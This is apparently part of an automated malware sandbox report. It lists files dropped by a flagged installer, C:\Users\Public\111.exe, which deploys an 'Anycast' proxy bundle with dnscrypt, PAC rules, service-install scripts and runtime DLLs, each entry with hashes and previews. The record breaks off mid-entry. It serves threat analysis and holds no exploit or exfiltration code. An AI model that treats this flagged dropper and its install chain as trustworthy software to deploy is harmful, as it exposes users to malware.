                                                                                                                            C:\Program Files (x86)\Anycast\dnscrypt\sf-zdh5of7ffyrm4qt4.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):307
                                                                                                                            Entropy (8bit):5.767687196289284
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:eRdIuXCAhgD55w9WZSEGXLkh30tKuouIueZrNdEM8VRSl43ObPdGoQ:IIktik9Ah8SuI/Zn98VKHblGX
                                                                                                                            MD5:39D586EEF61EF04C620EE5E2D6BE1FBB
                                                                                                                            SHA1:E8D03D86C6D96C593AFEEBD26AD0F1409ABB5CCF
                                                                                                                            SHA-256:4FB2D91BF63CA032EAB88E7B1CD8ACA47F5BD2564ADFA047E454486267EE24E1
                                                                                                                            SHA-512:F90EFC81A65F9773DCA21FC17071446C9A008671A1E0E708D9053BCC2A2C141ED1E2DA9F25B7EE7BEB8E0A810187C0C7AECE443060F3E637761C3246814C4894
                                                                                                                            Malicious:false
                                                                                                                            Preview:untrusted comment: signature from minisign secret key.RWQf6LRCGA9i57dZ6hU7PSRsEtC26D6S7JCDHiQCKciPacjgPllyRpDcmIXVCMknhXuegN8A4bRpEW+hlLD0showyhc6WmKLFA8=.trusted comment: timestamp:1710150847.file:public-resolvers.md.15nynHo8DvZSil75T37qjo5wMW5v11jxYFTgAOYat8Np9ZQ9fA7pej0T0DsRVSgrpjyv0Cxw7NXawi9c4wYLAA==.

                                                                                                                            C:\Program Files (x86)\Anycast\geo.mmdb

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):147946
                                                                                                                            Entropy (8bit):4.588168433081899
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:QoC8eZafhkISNxgMYGOeFXcGs71W2gXnEUmzDWWVyypHf9X76j+7pDMbToLdvVUl:QAqUexRFs83PmzDWmNa+NQbP1SHfvDNm
                                                                                                                            MD5:F15CBB1DC1ACBE7E003BE43C9FA6C62E
                                                                                                                            SHA1:C95A0085A1AD02D27F34EA60D9D4EAC1E05C42DD
                                                                                                                            SHA-256:055CE589C0A1B944E222DA7DD8F0B28622D20D5C3A6B669ED8234C258E9C2300
                                                                                                                            SHA-512:EA8AD6052D10F18689D88FA1B35C72E26643652239A2D971D85F6E2AA3F1A06180705F148197337BFB90D540F5FB3B2DDA125D6B5A3BD44F6308A568C49A78E0
                                                                                                                            Malicious:false
                                                                                                                            Preview:....`%....`%....`.....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%....`%.. .`%..!.`%..".`%..#.`%..$.`%..%.`%..&.`%..'.`%..(.`%..).`%..*.`%..+.`%..,.`%..-.`%....`%../.`%..0.`%..1.`%..2.`%..3.`%..4.`%..5.`%..6.`%..7.`%..8.`%..9.`%..:.`%..;.`%..<.`%..=.`%..>.`%..?.`%..@.`%..A.`%..B.`%..C.`%..D.`%..E.`%..F.`%..G.`%..H.`%..I.`%..J.`%..K.`%..L.`%..M.`%..N.`%..O.`%..P.`%..Q._...R.`%..S.`%..T.`%..U.`%..V.`%..W.`%..X.`%..Y.`%..Z.`%..[.`%..\.`%..].`%..^.`%.._.`%..`.`%..a.:...b.._..c..m..d..-..e..H..f.....g....`%..h..i.....j.....k.....l.....m.....n.....o.....p..x..q.`%..r.`%..s.`5..t.`%..u.`5..v.`%..w.`5.`%.`5..y.`%..z.`%..{.`5..|.`5..}.`5..~.`5....`5.`5.`%....`5....`%....`5....`5....`5..........`5.`5....`5.`%....`5....`5.`5.`%....`%....`%....`%....`5....`5....`5..........`5....`5.`%.`5....`5....`5.`5.`%....`5.......`5.`%....`%....`%....`5....`5....`5.`5.......`5.`5....`%.`5.`%.`5....

                                                                                                                            C:\Program Files (x86)\Anycast\gfwlst.pac

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):256487
                                                                                                                            Entropy (8bit):3.9211445697401657
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:pyknMF/dyxPsEhRHys9C3/Btd19FHdqNIuZ:oknMF/dePsEhRSoC3/BnHFHdqCuZ
                                                                                                                            MD5:85CD7963A3CF5A6AB1D6839A677903E9
                                                                                                                            SHA1:1E214300689984442E953F733E629AD7347076C4
                                                                                                                            SHA-256:AEC489F9FC1080BC857C904787DAA4F63376DC560882CC6160753D7CE97265A2
                                                                                                                            SHA-512:EA56907EECF07C07F42C56E0B828AAFFEC7D08F6D6AD95D83CD5929D42279534830247BE0BCB7609C18D9881F3B81A41E032ADFF7128E939A22F14AED6F9EC7F
                                                                                                                            Malicious:false
                                                                                                                            Preview:var rules = [.. [0, 0], .. [1, 6], .. [1, 2], .. [1, 14], .. [1, 2], .. [1, 1022], .. [1, 1022], .. [1, 1022], .. [1, 2046], .. [1, 4094], .. [1, 2046], .. [1, 2046], .. [1, 4094], .. [1, 2046], .. [1, 14], .. [1, 1022], .. [1, 2046], .. [1, 4094], .. [1, 2046], .. [1, 254], .. [1, 254], .. [1, 254], .. [1, 510], .. [1, 1022], .. [1, 2046], .. [1, 4094], .. [1, 8190], .. [1, 254], .. [1, 254], .. [1, 254], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], .. [2001, 2000], ..

                                                                                                                            C:\Program Files (x86)\Anycast\install.cmd

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):176
                                                                                                                            Entropy (8bit):4.2254443314733185
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:i0WWTsCvOEWWVLNjWWJLVmKLWj9WAcMoUNFrAliqm1BE9WAcMoUNFrA/Run:iITsCvVVLNdJLVmDpWAl3FAm1BWWAl3v
                                                                                                                            MD5:9373E747C788E2125EB5BF490F348AAB
                                                                                                                            SHA1:0131BD7438C76EF4D778C4325309E7C4D57C5009
                                                                                                                            SHA-256:4BD471D2094BA274FA3C7E5B0D6175C111B24759E8FA830F71C0DFC9E1DE5E80
                                                                                                                            SHA-512:44C85A343B6DD45B467CA6C543DA6D7ED30E91139442CE46D44EC37121F56D9A65DB491DE22E1D834F340C0311EF299B645930283CC21FEAEB015B5A40ACEE52
                                                                                                                            Malicious:false
                                                                                                                            Preview:anycast-service.exe stop..anycast-service.exe uninstall..anycast-service.exe install....dnscrypt\dnscrypt-proxy.exe -service install..dnscrypt\dnscrypt-proxy.exe -service start

                                                                                                                            C:\Program Files (x86)\Anycast\intranet.txt

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):429
                                                                                                                            Entropy (8bit):3.3326092310124307
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:MXAMhxaOQA1j1PMbhSk0JEwby0qfMW1dLR:MQStQhSk4e0qUuR
                                                                                                                            MD5:6EDC851C81FFE1B6C685B50C8BC76A9F
                                                                                                                            SHA1:53BD70FBD392460C1D0368FB069CAFBEE482C07A
                                                                                                                            SHA-256:B540CFB87BB9B91B803DB7BB1B8FCFC7DD0431167DB31A396451E7B6CBFC925A
                                                                                                                            SHA-512:2ED1D9910A48CD6A08E12CDC818364CEA5227EA06D919290CBFB170EA3D20413C230D4654FE92BF1C02CA5E6958F22AF1449AB8E16B0465356E20C6FD660421A
                                                                                                                            Malicious:false
                                                                                                                            Preview:10.0.0.0/9..10.128.0.0/10..10.192.0.0/11..10.224.0.0/12..10.240.0.0/13..10.248.0.0/14..10.252.0.0/15..10.254.0.0/16..10.255.0.0/17..10.255.128.0/18..10.255.192.0/19..10.255.224.0/20..10.255.240.0/21..10.255.248.0/22..10.255.252.0/23..10.255.254.0/24..100.64.0.0/10..169.254.0.0/16..172.16.0.0/12..192.0.0.0/29..192.0.2.0/24..192.88.99.0/24..192.168.0.0/16..198.18.0.0/15..198.51.100.0/24..203.0.113.0/24..224.0.0.0/4..240.0.0.0/4

                                                                                                                            C:\Program Files (x86)\Anycast\msvcp140.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):590112
                                                                                                                            Entropy (8bit):6.466935832340687
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:fFrCZUcfGI/O+bE9krdFFM5lle0dkM4X2n08ukSIAg6wQEKZm+jWodEEVrR+:9rCZUNYX2nSkGg6wQEKZm+jWodEE9R+
                                                                                                                            MD5:A11A1D761D757D367146F0F772632D8C
                                                                                                                            SHA1:9FD3EEE4C4111DC386510A930192D56A2E938DFE
                                                                                                                            SHA-256:2CC02C5E6654AA9175D5963F811CAC222F4A2604DC28553139C675B1A78995A7
                                                                                                                            SHA-512:6FBBB77766EE9846D6D3BDE2CED5EEAAFE721DE5524A410A4821DFA6C08EDBD00905BEC2B9237B8F7986D6D06DBE444C5845130193DA537CADAF29EA784C48E1
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............v}..v}..v}kR.}..v}..}..v}..w}..v}.w|..v}.r|..v}.u|..v}.s|M.v}.v|..v}..}..v}.t|..v}Rich..v}................PE..d...&U.^.........." .....@..........0$...............................................V....`A........................................Pi..h....C..,...............X;...... A......,... ...8...............................0............P......|e..@....................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data....:...`..."...N..............@....pdata..X;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\networks.txt

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):123043
                                                                                                                            Entropy (8bit):3.4759715229310215
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:FQXFi+zvR8A1I7/bzen1cEBE4UnFFCLeO7CExk4L3LPLTDZ5LXmVVyj75CpbqoH/:Wq
                                                                                                                            MD5:B1D0FD355A736EFD55146F067C120C5C
                                                                                                                            SHA1:E042BAA84C9E4C7E9660DCB046E6C5F81B305826
                                                                                                                            SHA-256:81BDD474A4CF3E3E93DCEF6F2A616D67DE18A6FBA2E1C45FC68F2DA2FF79CC52
                                                                                                                            SHA-512:E8FCBB4BBB55FB1BD26C9B1EC495F7A9FAF241D5F77EC489E45540D28B4E992431189D9A6CE1E74E0E4EB4B21E261DB2A52E634D86D7D5088F0EA302302E019E
                                                                                                                            Malicious:false
                                                                                                                            Preview:1.0.1.0/24..1.0.2.0/23..1.0.8.0/21..1.0.32.0/19..1.1.0.0/24..1.1.2.0/23..1.1.4.0/22..1.1.8.0/21..1.1.16.0/20..1.1.32.0/19..1.2.0.0/23..1.2.2.0/24..1.2.4.0/22..1.2.8.0/24..1.2.10.0/23..1.2.12.0/22..1.2.16.0/20..1.2.32.0/19..1.2.64.0/18..1.3.0.0/16..1.4.1.0/24..1.4.2.0/23..1.4.4.0/22..1.4.8.0/24..1.4.10.0/23..1.4.12.0/22..1.4.16.0/20..1.4.32.0/19..1.4.64.0/18..1.8.0.0/16..1.10.0.0/21..1.10.8.0/23..1.10.11.0/24..1.10.12.0/22..1.10.16.0/20..1.10.32.0/19..1.10.64.0/18..1.12.0.0/14..1.24.0.0/13..1.34.0.0/32..1.45.0.0/16..1.46.60.1/32..1.48.0.0/14..1.56.0.0/13..1.68.0.0/14..1.80.0.0/12..1.116.0.0/15..1.118.0.0/19..1.118.33.0/24..1.118.34.0/23..1.118.36.0/22..1.118.40.0/21..1.118.48.0/20..1.118.64.0/18..1.118.128.0/17..1.119.0.0/16..1.180.0.0/14..1.184.0.0/15..1.188.0.0/14..1.192.0.0/13..1.202.0.0/15..1.204.0.0/14..3.2.35.128/26..5.42.192.0/24..5.62.34.41/32..5.62.34.42/31..5.62.34.45/32..5.62.34.46/31..5.62.35.9/32..5.62.35.11/32..5.180.244.0/22..8.27.67.42/31..8.27.67.44/32..8.27.67.52/32..8

                                                                                                                            C:\Program Files (x86)\Anycast\uninst.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):170992
                                                                                                                            Entropy (8bit):5.8525622426109605
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:gNRCywDw1DiJku4UsGCfbiRdIAlrkztttv6:gT4Dt8bGCfOhpkzttB6
                                                                                                                            MD5:21E550D83F4CFD2B02C732F1731333A3
                                                                                                                            SHA1:4B66B6B9C7893EB4E9B74C7EA23C5A35830BFCEA
                                                                                                                            SHA-256:A333BF76E3D7A886B4883CE8C1BD77FE213CA1AF293F1F3D5902CFC49CB73559
                                                                                                                            SHA-512:282E1DA26F241ABA349A45D8D08CD7E19CE3F03AB793F72E8C1BA21D30583139EE0EE3C53A90EDA0F2CB994A5F8D9076D0742FCC45F6FBD64A1988FF9E121493
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...@.$_.................h...........4............@.......................................@.........................................................8...P&...........................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata...0...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\uninstall.cmd

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):168
                                                                                                                            Entropy (8bit):4.306686667460849
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:i0WWTsCvOEWWVLNKLWj9WAcMoUNFrA/RHv0j9WAcMoUNFrA54YPgW0MQn:iITsCvVVLNDpWAl3FSHv0pWAl3FQPODn
                                                                                                                            MD5:DD8D3954F3E4846629190A676BA062E7
                                                                                                                            SHA1:E877DC8C5A470B9E0C3C8422FA21BE182F27C447
                                                                                                                            SHA-256:0EE9500F3F777F995A6443067DBDB156DF5462F2A22C495F1C50A9BBBA9B00A7
                                                                                                                            SHA-512:33B1D6D1D983CF4CAD3C5EB2670503B83553630D3E46158D62CDE9B5534EADD41AC83F6B79FA842D3CE45692A9326FA8E69E6C9C0A8133106A0DD27BB900438F
                                                                                                                            Malicious:false
                                                                                                                            Preview:anycast-service.exe stop..anycast-service.exe uninstall....dnscrypt\dnscrypt-proxy.exe -service stop..dnscrypt\dnscrypt-proxy.exe -service uninstall....anycast.exe quit

                                                                                                                            C:\Program Files (x86)\Anycast\vcruntime140.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):100880
                                                                                                                            Entropy (8bit):6.563642954927723
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:ymvjI3Bn7RjCR3jgLexGWDvGBx4MelIm+2ecbQ0XF1I94g:y04cgEKe+R2ecbQ0XFex
                                                                                                                            MD5:6BA0DBCD2DB8F44243799C891DBD2A59
                                                                                                                            SHA1:30A2719D4B8667FD237BCFB781660901C993D9FC
                                                                                                                            SHA-256:263988A0868053B6B01835CD2959C8F71E3F943610421B269DA646F2D9E3B333
                                                                                                                            SHA-512:94DEA85EF50D55CEC0D1BBAE4671386CE8CA02E870CE417ABFEF0A8499FDF0BD0EB5BA38DEBD07C213F7DA39CBEA63A18143484B05E9C7CA36B2F68E4520BB4D
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.a..............................!..................................................Rich....................PE..d... U.^.........." .........^......P................................................b....`A.........................................0..4....8.......p.......P.......H...B..............8...............................0............................................text...T........................... ..`.rdata...>.......@..................@..@.data........@.......0..............@....pdata.......P.......4..............@..@_RDATA.......`.......@..............@..@.rsrc........p.......B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\vcruntime140_1.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):44320
                                                                                                                            Entropy (8bit):6.615138117349117
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:RPWiU0RnpFSvzRz3wdAevN3lEWSPm1zw4:RPk7Z3wlplzD1zw4
                                                                                                                            MD5:6FE223CE568D919F80BEA233738D0628
                                                                                                                            SHA1:D7BF5ACFB4BED8B0790DFC617A9B6F899B484D4A
                                                                                                                            SHA-256:DA5D3440DD53261BFFEC0F9163A46EB12E46B2A4E1BD72DD1B62C6BCA9CCA280
                                                                                                                            SHA-512:420BDE4DA4F2E9CB0B4A26C11A4CDB405656EAEC6B9E8EBCFE8C6B71682DD02CEA0A26ED01EEA2295BF1B574EA7EC33E15B5B1CF742694EE8AEED07FEB1E6543
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7.&.s.H.s.H.s.H..Z..q.H.x.I.q.H.z...x.H.s.I.B.H.x.K.w.H.x.L.t.H.x.M.j.H.x.H.r.H.x...r.H.x.J.r.H.Richs.H.................PE..d...cU.^.........." .....:...4......PA....................................................`A.........................................j......|k..x....................l.. A......8....b..8...........................@b..0............P..X............................text...49.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\wintun.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):427552
                                                                                                                            Entropy (8bit):6.403238889707664
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:uNsLgQtz9nDZL4tFDjiaOE1DfsnyDQhWmnPIt:iggQh9nD2tFviW4/Qt
                                                                                                                            MD5:E861EB5789C50997D9476A6172D1C269
                                                                                                                            SHA1:647EB6588B149EFE2477FD192C8CAB74D018D8EF
                                                                                                                            SHA-256:E5DA8447DC2C320EDC0FC52FA01885C103DE8C118481F683643CACC3220DAFCE
                                                                                                                            SHA-512:D8B49A6834C1EA5D73FEE6979C59DEF18900C86D598EA900AB741CE71EEFDAAADB4862AFEFA14E6CC093007EAE5D4325857633549F1ADE555BAA0344B18E6112
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........0...^...^...^.3.]..^.3.[.o.^..Z..^..]..^..[...^.3.Z..^.3._..^......^..._._.^.X.V..^.X.^..^.X....^......^.X.\..^.Rich..^.........................PE..d.....ka.........." .....&...>.......................................................r....`A.........................................).......+..<............`.......V.. 0..........@...T...........................0G..8............@......t........................text....%.......&.................. ..`.rdata.......@.......*..............@..@.data...`....@.......$..............@....pdata.......`.......0..............@..@.didat...............L..............@..._RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............N..............@..B................................................................................................................................

                                                                                                                            C:\Program Files (x86)\Anycast\zh-CN\Anycast.resources.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):15360
                                                                                                                            Entropy (8bit):4.701465673604797
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:XGmts6+3hSvY6QFo11+LsGkpFbmtRbi4SYDjllfctuIjSxB:Wx6+3hSvY64o11+LsGkpFajbbSYDp/
                                                                                                                            MD5:8F060ABB87E1AF035A3DD634DED1C146
                                                                                                                            SHA1:8884028C235272F0C061296EE60FB0EA829F559B
                                                                                                                            SHA-256:6E170D08A4EA4F2DCD0C5FC9D07BF010CB21E6F1C904A299583B04A959FBC82D
                                                                                                                            SHA-512:351CDDA430DD4882C77FF16DD2DD1E46A7DE2F4D21CB6593026565E69DA72E14BD93CC82025458AB2498EEF1FD4CF70B4B033980D05829772BCE41AA2868E1FF
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@<e...........!.....2...........P... ...`....... ....................................@.................................TP..W....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................P......H........L..`...........P ...,...........................................,.............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....e.......PADPADP.0.>...C...w..tT&.<..]S.w.r.w7..B...Gn../.`.:..V..S..u8N.....t....X......j..l..-.......0.......X..q<.b...gl..n. .b........O..qa..B.q....@.h......h......F;.;......~H....."V..,.i.p.p.^...=..@N...`..y...C.Z.gEo.L.|.

                                                                                                                            C:\Program Files (x86)\Anycast\zh-TW\Anycast.resources.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):14848
                                                                                                                            Entropy (8bit):4.7694816593891085
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:iukQAnIuz46EVQIIZZyHHO8U14yZZn9T4Gr7KBaJQ:ihHnIuM6EVQIIZZyHHO8U15z0G2V
                                                                                                                            MD5:BCFE8EAC84D2D7969458321EE1B450A4
                                                                                                                            SHA1:1A31D361FB65E4B83BF1319880FA777218CDA699
                                                                                                                            SHA-256:917D87EC7F0401166695CEC0ED9A8FA9EBEADD88290DBA40C01C63EFD7B6703D
                                                                                                                            SHA-512:F794A1A184BC17FF4098AB2744BAB75760A022566AE27F6B243F602242F879ADFE20BFDD9E7E76C80934DF570B5FA3F39C1DA4502F5CC04CBFA0F5368B743641
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@<e...........!.....0...........O... ...`....... ....................................@..................................O..W....`............................................................................... ............... ..H............text..../... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................O......H.......$L..`...........P ...+...........................................+.............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....c.......PADPADP.0.>...C...w..tT&.<..]S.w.r.w7..B...Gn../.`.:..V..S..u8N.....t....X......j..l..-.......0.......X..q<.b...gl..n. .b........O..qa..B.q....@.h......h......F;.;......~H....."V..,.i.p.p.^...=..@N...`..y...C.Z.gEo.L.|.

                                                                                                                            C:\Users\Public\111.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):11223944
                                                                                                                            Entropy (8bit):7.994568058251744
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:196608:CvyhL33XXLybGKdNGYj+MxmpVAI62jSBuUtW1lJwo2LrKUYV9bWI:CKhL3HyGGlj+E3I6Ev0Pex
                                                                                                                            MD5:25D325AFB078B572B0FBCA2B84AA264C
                                                                                                                            SHA1:6EF782ACF674F3E66B5973E143C2FDDA7E076914
                                                                                                                            SHA-256:A3C3F7A0014E41FF435DB5B87EC92E60ADA72A94FC401CB1EF3CF6DAF71630E1
                                                                                                                            SHA-512:F4FF58F70A06C425AD832AA19B3DD51B2B4FC534DBA8D2CD68A49D5C22E3CE366F5D8B33CD687C7E5A64FB3AB02E60330D66A0C3BFAB09750B2AFAA508705B68
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...@.$_.................h...........4............@.......................................@.........................................................8...P&...........................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata...0...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Anycast\Anycast.exe_Url_kqhrjl0namicahrzazwrmvt22k2r0j2i\1.0.24.0\4zsjultz.newcfg

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):322
                                                                                                                            Entropy (8bit):4.494454117158092
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:TMVBd1IGnOYOAOYYYAP0RXKRF/+uKpvvvXlfOAONI3QIT:TMHdGGnOYOAOXQEN+uKpvvvXlfOAONI5
                                                                                                                            MD5:F17B8DE2E8647F56928ED3780C3DB421
                                                                                                                            SHA1:5377A4370580EECB255555BE6853D9D913BC07B2
                                                                                                                            SHA-256:517C5881D8C8794D7C3614CCFB04B45E3B1D4D6BA4E880965D780B894ECDEFA0
                                                                                                                            SHA-512:7D6AAB54A9A03E3E6A5593E4FAF8F754B605B480A64A095B7401A237FB869ED62DFA9F680C60393FFE702058510F39583FDD80B2A8829D35A2177F827772F015
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <userSettings>.. <Anycast.Properties.Settings>.. <setting name="UpgradeRequired" serializeAs="String">.. <value>False</value>.. </setting>.. </Anycast.Properties.Settings>.. </userSettings>..</configuration>

                                                                                                                            C:\Users\user\AppData\Local\Anycast\Anycast.exe_Url_kqhrjl0namicahrzazwrmvt22k2r0j2i\1.0.24.0\user.config (copy)

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):322
                                                                                                                            Entropy (8bit):4.494454117158092
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:TMVBd1IGnOYOAOYYYAP0RXKRF/+uKpvvvXlfOAONI3QIT:TMHdGGnOYOAOXQEN+uKpvvvXlfOAONI5
                                                                                                                            MD5:F17B8DE2E8647F56928ED3780C3DB421
                                                                                                                            SHA1:5377A4370580EECB255555BE6853D9D913BC07B2
                                                                                                                            SHA-256:517C5881D8C8794D7C3614CCFB04B45E3B1D4D6BA4E880965D780B894ECDEFA0
                                                                                                                            SHA-512:7D6AAB54A9A03E3E6A5593E4FAF8F754B605B480A64A095B7401A237FB869ED62DFA9F680C60393FFE702058510F39583FDD80B2A8829D35A2177F827772F015
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <userSettings>.. <Anycast.Properties.Settings>.. <setting name="UpgradeRequired" serializeAs="String">.. <value>False</value>.. </setting>.. </Anycast.Properties.Settings>.. </userSettings>..</configuration>

                                                                                                                            C:\Users\user\AppData\Local\Anycast\Anycast.exe_Url_kqhrjl0namicahrzazwrmvt22k2r0j2i\1.0.24.0\xoon3ujz.newcfg

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):608
                                                                                                                            Entropy (8bit):4.527482809804559
                                                                                                                            Encrypted:false
